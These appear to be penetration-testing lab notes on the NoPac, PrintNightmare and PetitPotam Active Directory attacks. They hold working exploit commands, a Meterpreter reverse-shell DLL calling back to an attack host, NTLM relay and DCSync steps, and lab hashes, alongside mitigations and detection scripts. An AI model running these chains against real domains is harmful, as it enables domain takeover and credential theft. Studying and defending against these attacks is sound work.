Bleeding Edge Vulnerabilities

These three attacks give rapid privilege escalation, and in the PetitPotam case domain compromise from a low-privileged or (pre-patch) unauthenticated position, in unpatched AD environments. All commands use the lab user mrci0x1 wherever credentials are needed.

Lab Setup:

  • Attack Host: Linux-based ATTACK01 (accessed via SSH) for most attacks.

  • Windows Host: MS01 for Windows-based tools (e.g., Rubeus, Mimikatz).

  • Target: INLANEFREIGHT.LOCAL domain, DC at 172.16.5.5.

1. NoPac (SamAccountName Spoofing)

Vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing), CVE-2021-42287 (KDC name/PAC confusion) Impact: Escalates a standard domain user to Domain Admin in one command. Description: A low-privileged user adds a machine account, clears its servicePrincipalName and renames its sAMAccountName to the DC's name without the trailing `$` (CVE-2021-42278). A TGT is requested under that name, the account is renamed back, and the TGT is then used in an S4U2self request for Administrator; because the KDC no longer finds the original name it appends `$` and issues a service ticket for the real DC (CVE-2021-42287). That ticket gives SYSTEM on the DC.

Prerequisites

  • Impacket and the NoPac repository on ATTACK01 (scanner.py and noPac.py are run from the cloned noPac directory):

mrci0x1@htb[/htb]$ git clone https://github.com/SecureAuthCorp/impacket.git
mrci0x1@htb[/htb]$ cd impacket && python3 setup.py install
mrci0x1@htb[/htb]$ git clone https://github.com/Ridter/noPac.git
  • Domain user credentials: mrci0x1:Klmcargo2.

  • ms-DS-MachineAccountQuota greater than 0 (the default is 10), so mrci0x1 can add a machine account; alternatively, control of an existing computer account.

Scanning

mrci0x1@htb[/htb]$ python3 scanner.py inlanefreight.local/mrci0x1:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5

Execution

Gain SYSTEM shell:

mrci0x1@htb[/htb]$ python3 noPac.py INLANEFREIGHT.LOCAL/mrci0x1:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
[*] Successfully added machine account WIN-LWJFQMAXRVN$
[*] Saving ticket in administrator.ccache
[*] Exploiting...
C:\Windows\system32>

Alternative: DCSync

mrci0x1@htb[/htb]$ python3 noPac.py INLANEFREIGHT.LOCAL/mrci0x1:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator
[*] Dumping Domain Credentials
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::

OpSec

  • Risks: The -shell option runs smbexec under the hood, which creates a service (BTOBTO, BTOBO) and an associated .bat file on the DC; AV/EDR commonly flags this (e.g., VirTool:Win32/MSPSEexecCommand). The added machine account (WIN-LWJFQMAXRVN$ above) and its rename are also written to the Security log as computer-account audit events (4741/4742).

  • Mitigation: Apply the November 2021 updates for both CVEs on every DC (the patched KDC also logs its own spoofing-detection events). Setting ms-DS-MachineAccountQuota to 0 only closes the add-computer path; an attacker who already controls a computer account can still run the attack against an unpatched DC.
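
The rename step is the part of NoPac a defender can catch before any ticket is issued. The following is an added example (not from the original notes, not part of noPac.py) that correlates constructed Security log records: a computer account created (Event ID 4741) by a subject who then changes a computer account's SAM Account Name (Event ID 4742) to a value with no trailing `$` or to a Domain Controller's name. The event records, the `Event` field layout and the KNOWN_DCS set are assumptions for the lab in these notes.

```python
from dataclasses import dataclass
from typing import Optional

# Assumed for the lab: names (without '$') of accounts that must never be mimicked.
KNOWN_DCS = {"ACADEMY-EA-DC01"}


@dataclass
class Event:
    """Minimal view of a Security log record; fields mirror the 4741/4742 event data."""
    event_id: int
    subject: str                    # Subject > Account Name (who made the change)
    target: str                     # Computer Account That Was Created/Changed > Account Name
    sam_name: Optional[str] = None  # Changed Attributes > SAM Account Name (4742 only)


# Constructed sample, not real log data: the NoPac sequence from the notes,
# followed by benign noise from a helpdesk account joining a workstation.
SAMPLE_EVENTS = [
    Event(4741, "INLANEFREIGHT\\mrci0x1", "WIN-LWJFQMAXRVN$"),
    Event(4742, "INLANEFREIGHT\\mrci0x1", "WIN-LWJFQMAXRVN$", "ACADEMY-EA-DC01"),  # '$' dropped, DC name
    Event(4742, "INLANEFREIGHT\\mrci0x1", "ACADEMY-EA-DC01", "WIN-LWJFQMAXRVN$"),  # rename back after the TGT
    Event(4741, "INLANEFREIGHT\\helpdesk", "WS-FINANCE07$"),
    Event(4742, "INLANEFREIGHT\\helpdesk", "WS-FINANCE07$", "WS-FINANCE07$"),
]


def rename_reason(ev: Event, known_dcs=KNOWN_DCS) -> Optional[str]:
    """Explain why a 4742 looks like a NoPac rename, or return None if it does not."""
    if ev.event_id != 4742 or not ev.sam_name:
        return None
    if ev.sam_name.rstrip("$").upper() in known_dcs:
        return "computer account renamed to a Domain Controller's name"
    if not ev.sam_name.endswith("$"):
        return "computer sAMAccountName set without the trailing '$'"
    return None


def find_nopac_chains(events, known_dcs=KNOWN_DCS):
    """Correlate 4741 and suspicious 4742 events by the subject that performed them.

    One finding per suspicious rename. 'created_account_first' is True when the same
    subject created a computer account earlier in the batch, which is exactly the shape
    of the default noPac.py run (add an account, then rename it).
    """
    creators = set()
    findings = []
    for ev in events:
        if ev.event_id == 4741:
            creators.add(ev.subject)
        reason = rename_reason(ev, known_dcs)
        if reason:
            findings.append({
                "subject": ev.subject,
                "account": ev.target,
                "new_name": ev.sam_name,
                "reason": reason,
                "created_account_first": ev.subject in creators,
            })
    return findings


if __name__ == "__main__":
    for f in find_nopac_chains(SAMPLE_EVENTS):
        print(f"[!] {f['subject']} renamed {f['account']} -> {f['new_name']}: {f['reason']}"
              f" (created a computer account first: {f['created_account_first']})")
```

The rename back to WIN-LWJFQMAXRVN$ is deliberately not flagged on its own: it looks like a normal computer rename, which is why the correlation keys on the subject rather than on the account name.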

2. PrintNightmare

Vulnerabilities: CVE-2021-34527 (remote code execution), CVE-2021-1675 (local privilege escalation) Impact: An authenticated domain user gets SYSTEM on any host running the Print Spooler, including DCs. Description: The spooler's driver-installation path (RpcAddPrinterDriverEx over MS-RPRN, or the MS-PAR equivalent) lets a non-admin caller point it at a DLL on a UNC path; the spooler copies the DLL in as a printer driver and loads it inside spoolsv.exe, which runs as SYSTEM.

Prerequisites

  • Install cube0x0's Impacket fork (stock Impacket lacks the MS-RPRN/MS-PAR client code the exploit needs, so the existing install is removed first) and the exploit:

mrci0x1@htb[/htb]$ pip3 uninstall impacket
mrci0x1@htb[/htb]$ git clone https://github.com/cube0x0/impacket
mrci0x1@htb[/htb]$ cd impacket && python3 setup.py install
mrci0x1@htb[/htb]$ git clone https://github.com/cube0x0/CVE-2021-1675.git
  • Credentials: mrci0x1:Klmcargo2.

  • Print Spooler service running on the target (it is enabled by default on DCs).

Enumeration

mrci0x1@htb[/htb]$ rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

Execution

  1. Create the malicious DLL:

mrci0x1@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll
  2. Host it via SMB (the share path is the directory that holds backupscript.dll, not the file itself; binding port 445 needs root):

mrci0x1@htb[/htb]$ sudo smbserver.py -smb2support CompData /path/to/share
  3. Set up the Metasploit handler:

mrci0x1@htb[/htb]$ msfconsole
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 172.16.5.225
msf6 > set LPORT 8080
msf6 > run
  4. Run the exploit (the UNC path is what the spooler on the DC fetches, so it must point at the attack host's share):

mrci0x1@htb[/htb]$ python3 CVE-2021-1675.py inlanefreight.local/mrci0x1:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
[*] Meterpreter session 1 opened
C:\Windows\system32> whoami
nt authority\system

OpSec

  • Risks: A failed driver load can crash the Print Spooler (a visible outage on a print server). The DLL is copied into the spooler's driver directory on the target and fetched over SMB from the attack host, so both the file write and the outbound SMB connection from a DC are likely to trigger AV/EDR, and the driver installation is recorded in the PrintService event logs.

  • Mitigation: Disable the Print Spooler service on DCs and on any server that does not need to print; apply the July 2021 and later updates, and keep the post-patch default that restricts driver installation to administrators (RestrictDriverInstallationToAdministrators = 1 under the Point and Print policy key), since permissive Point and Print settings reopen the hole.
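
The egrep in the enumeration step only shows that the print interfaces are registered with the endpoint mapper. What the exploit actually needs is a binding another host can reach: ncacn_np (\pipe\spoolss over SMB) or ncacn_ip_tcp, not just a local ncalrpc binding. The following is an added example (not from the original notes, and not part of rpcdump.py or the cube0x0 exploit) that parses rpcdump.py's record format and reports which print interfaces are remotely reachable. The sample text is constructed in rpcdump's output format; the dynamic ports, the LRPC name and the third (non-print) UUID are made up for this example, while the MS-RPRN and MS-PAR interface UUIDs are the ones from the protocol specifications.

```python
import re

# Interface UUIDs of the two print protocols, as published in the MS-RPRN and MS-PAR specs.
PRINT_INTERFACES = {
    "12345678-1234-ABCD-EF00-0123456789AB": "MS-RPRN",
    "76F03F96-CDFD-44FC-A22C-64950A001209": "MS-PAR",
}

# Transports reachable from another host; ncalrpc is local-only and useless to the exploit.
REMOTE_TRANSPORTS = ("ncacn_np", "ncacn_ip_tcp")

# Constructed sample in rpcdump.py's record format (not real output from the lab).
SAMPLE_RPCDUMP = r"""Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:172.16.5.5[49664]
          ncacn_np:\\ACADEMY-EA-DC01[\pipe\spoolss]
          ncalrpc:[LRPC-3c3b8ab2f5a4d2e1c9]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncalrpc:[LRPC-3c3b8ab2f5a4d2e1c9]

Protocol: N/A
Provider: N/A
UUID    : A1B2C3D4-E5F6-4A7B-8C9D-0E1F2A3B4C5D v1.0
Bindings:
          ncacn_ip_tcp:172.16.5.5[49669]
"""


def parse_rpcdump(text):
    """Return {interface UUID: [binding string, ...]} from rpcdump.py output."""
    records, uuid = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"UUID\s*:\s*([0-9A-Fa-f-]{36})", line)
        if m:
            uuid = m.group(1).upper()
            records.setdefault(uuid, [])
        elif uuid and re.match(r"^nca\w+:", line):   # ncacn_*, ncalrpc, ncadg_* bindings
            records[uuid].append(line)
    return records


def exposed_print_interfaces(text):
    """Map MS-RPRN / MS-PAR to bindings another host could reach; omit local-only ones."""
    exposed = {}
    for uuid, bindings in parse_rpcdump(text).items():
        name = PRINT_INTERFACES.get(uuid)
        if name is None:
            continue
        remote = [b for b in bindings if b.split(":", 1)[0] in REMOTE_TRANSPORTS]
        if remote:
            exposed[name] = remote
    return exposed


if __name__ == "__main__":
    # Typical use: rpcdump.py @172.16.5.5 > dump.txt, then feed the file contents here.
    for name, binds in exposed_print_interfaces(SAMPLE_RPCDUMP).items():
        print(f"{name} reachable via: {', '.join(binds)}")
```

In the constructed sample MS-PAR is registered but only bound to ncalrpc, so only MS-RPRN is reported; against a real host, an MS-RPRN record with no ncacn_np binding usually means the spooler is stopped or the pipe is blocked, and the exploit will not get a connection.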

3. PetitPotam (MS-EFSRPC)

Vulnerability: CVE-2021-36942 Impact: Coerces a DC's machine account into authenticating to an attacker host; relayed to AD CS, this yields a DC certificate, a TGT as the DC, and a full DCSync. Description: The MS-EFSRPC interface (EfsRpcOpenFileRaw and related methods) accepts a UNC path and makes the DC connect to it with NTLM, pre-patch without any credentials. ntlmrelayx forwards that authentication to the AD CS Web Enrollment page (certsrv) and requests a certificate from the DomainController template (the ESC8 relay condition); the certificate then authenticates as ACADEMY-EA-DC01$ via PKINIT, and the DC's own account is allowed to replicate directory secrets.

Prerequisites

  • Impacket and PetitPotam.py:

mrci0x1@htb[/htb]$ pip3 install impacket
mrci0x1@htb[/htb]$ git clone https://github.com/topotam/PetitPotam
  • AD CS with Web Enrollment (certsrv) reachable over HTTP and accepting NTLM, which is the ESC8 condition the relay depends on.

  • Tools: ntlmrelayx.py, gettgtpkinit.py, secretsdump.py.

Execution

  1. Start the NTLM relay (needs root for ports 445 and 80; leave it running in its own terminal). The certificate shown here is printed only after the coercion in step 2 lands:

mrci0x1@htb[/htb]$ sudo ntlmrelayx.py -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
[*] GOT CERTIFICATE!
[*] Base64 certificate of user ACADEMY-EA-DC01$: MIIStQIBAzCCEn8GCSqGSIb3...
  2. Coerce DC authentication (arguments are the listener IP, then the target DC):

mrci0x1@htb[/htb]$ python3 PetitPotam.py 172.16.5.225 172.16.5.5
[+] Attack worked!
  3. Request a TGT for the DC's machine account via PKINIT with the relayed certificate:

mrci0x1@htb[/htb]$ python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSIb3... dc01.ccache
  4. Point Impacket at the ticket cache:

mrci0x1@htb[/htb]$ export KRB5CCNAME=dc01.ccache
  5. Perform the DCSync as the DC:

mrci0x1@htb[/htb]$ secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::

Alternative: Windows-Based (Rubeus)

On MS01:

PS C:\Tools> .\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC... /ptt
[*] TGT request successful!
[*] base64(ticket.kirbi): doIGUDCCBkygAwIBBaEDAgEWooIFSDCCBUYmLdFSDCC...
PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt"
Credentials:
  Hash NTLM: 16e26ba33e455a8c338142af8d89ffbc

OpSec

  • Risks: The DC's machine account performs an NTLM network logon to the CA from the attacker's IP, and the CA records a DomainController-template certificate issued to ACADEMY-EA-DC01$; both are easy to alert on.

  • Mitigation: Apply the CVE-2021-36942 patch, which closes only the unauthenticated EfsRpc trigger (authenticated coercion through other RPC interfaces still works with any domain credential), then harden the relay target: disable AD CS Web Enrollment if unused, otherwise require HTTPS with Extended Protection for Authentication on the certsrv site and disable NTLM there; restrict inbound NTLM to DCs where feasible.
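
The relay leaves two artefacts in the same short window: a network logon by the DC's machine account, over NTLM, from an IP that is not the DC's, recorded on the relay target (the CA web server, Event ID 4624), followed by the CA issuing a certificate to that same account (Event ID 4887, with the template in the request attributes). The following is an added example (not from the original notes, not part of PetitPotam or ntlmrelayx) that chains those two signals over constructed sample events. The asset inventory, the event field names and the sample records are assumptions for the lab in these notes, not a particular SIEM schema.

```python
# Assumed asset inventory for the lab: the IP each machine account should log on from.
EXPECTED_SOURCE_IP = {
    "ACADEMY-EA-DC01$": "172.16.5.5",
    "WS-FINANCE07$": "172.16.5.130",
}

# Constructed sample, not real telemetry. 4624 rows are network logons as seen on the
# relay target (the CA web server); 4887 rows are the CA's 'certificate issued' events,
# with the template taken from the request attributes. Field names are this example's own.
SAMPLE_EVENTS = [
    {"id": 4624, "host": "ACADEMY-EA-CA01", "account": "ACADEMY-EA-DC01$",
     "logon_type": 3, "auth_package": "NTLM", "src_ip": "172.16.5.225"},   # relayed coercion
    {"id": 4887, "host": "ACADEMY-EA-CA01", "requester": "INLANEFREIGHT\\ACADEMY-EA-DC01$",
     "template": "DomainController"},
    {"id": 4624, "host": "ACADEMY-EA-CA01", "account": "ACADEMY-EA-DC01$",
     "logon_type": 3, "auth_package": "Kerberos", "src_ip": "172.16.5.5"},   # benign
    {"id": 4624, "host": "ACADEMY-EA-DC01", "account": "WS-FINANCE07$",
     "logon_type": 3, "auth_package": "NTLM", "src_ip": "172.16.5.130"},     # benign
    {"id": 4887, "host": "ACADEMY-EA-CA01", "requester": "INLANEFREIGHT\\WS-FINANCE07$",
     "template": "Machine"},                                                  # benign autoenrol
]


def is_relayed_machine_logon(ev, expected=EXPECTED_SOURCE_IP):
    """A machine account using NTLM over the network from an IP that is not its own host."""
    if ev["id"] != 4624 or ev["logon_type"] != 3 or ev["auth_package"] != "NTLM":
        return False
    if not ev["account"].endswith("$"):
        return False
    home = expected.get(ev["account"])
    # Unknown accounts are skipped rather than flagged; keep the inventory current.
    return home is not None and ev["src_ip"] != home


def coerced_cert_issuances(events, expected=EXPECTED_SOURCE_IP):
    """Certificates the CA issued to a machine account after that account showed a relayed logon."""
    suspects, findings = set(), []
    for ev in events:                       # events are assumed to be in time order
        if is_relayed_machine_logon(ev, expected):
            suspects.add(ev["account"])
        elif ev["id"] == 4887 and ev["requester"].split("\\")[-1] in suspects:
            findings.append({"account": ev["requester"], "template": ev["template"], "ca": ev["host"]})
    return findings


if __name__ == "__main__":
    for f in coerced_cert_issuances(SAMPLE_EVENTS):
        print(f"[!] {f['ca']} issued a {f['template']} certificate to {f['account']}"
              f" right after that account authenticated with NTLM from a foreign IP")
```

The first signal alone (a machine account authenticating from the wrong IP over NTLM) is worth an alert on its own, because it fires for any coercion-plus-relay chain, not only the AD CS one; the certificate correlation is what tells you the relay actually succeeded and what it obtained.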
